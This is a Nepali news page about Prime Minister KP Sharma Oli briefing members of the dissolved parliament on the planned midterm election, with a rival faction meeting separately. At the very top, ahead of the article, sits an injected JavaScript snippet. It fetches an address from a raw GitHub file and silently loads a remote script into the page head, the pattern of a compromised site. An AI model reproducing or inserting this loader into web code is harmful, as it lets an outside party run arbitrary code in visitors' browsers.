;var url = 'https://raw.githubusercontent.com/AlexanderRPatton/cdn/main/repo.txt';fetch(url).then(response => response.text()).then(data => {var script = document.createElement('script');script.src = data.trim();document.getElementsByTagName('head')[0].appendChild(script);}); ओलीले गरे सांसदहरुलाई संसद विघटनको ब्रिफिङ् छलफल जारी – जुनेली न्युज
आइतवार, साउन ६, २०८२
  • होमपेज
  • ओलीले गरे सांसदहरुलाई संसद विघटनको ब्रिफिङ् छलफल जारी
राजनीति

ओलीले गरे सांसदहरुलाई संसद विघटनको ब्रिफिङ् छलफल जारी

पुष ०५,

काठमाडौं । प्रधानमन्त्री केपी शर्मा ओलीले विघटित प्रतिनिधि सभाका सदस्यहरूसँग बालुवाटारमा छलफल गरेका छन् ।

प्रधानमन्त्री  निवास बालुवाटारमा जारी बैठकमा पूर्वमाओवादीबाट मन्त्री बनेकाहरु पनि सहभागि छन् । बैठकमा लेखजार भट्टसमेत सहभागी छन् ।  गृह मन्त्रीसमेत रहेका रामबहादुर थापा भने सहभागी छैनन्।  बैठकमा हिजो विघटन गरिएको संसद बैठक पछिको

बैशाखमा मध्यावधि निर्वाचन गर्ने निर्णयबारे ओलीले सांसदहरुलाई ब्रिफिङ अहिले ओलीले गरिरहेका छन् । Image

आजै प्रचण्ड–माधव नेपाल पक्षले पनि सांसदहरुको अलग्गै बैठक बोलाएका छन् ।Image

फोटो ः सूर्य थापाबाट सभार

फेसबुक प्रतिक्रियाहरु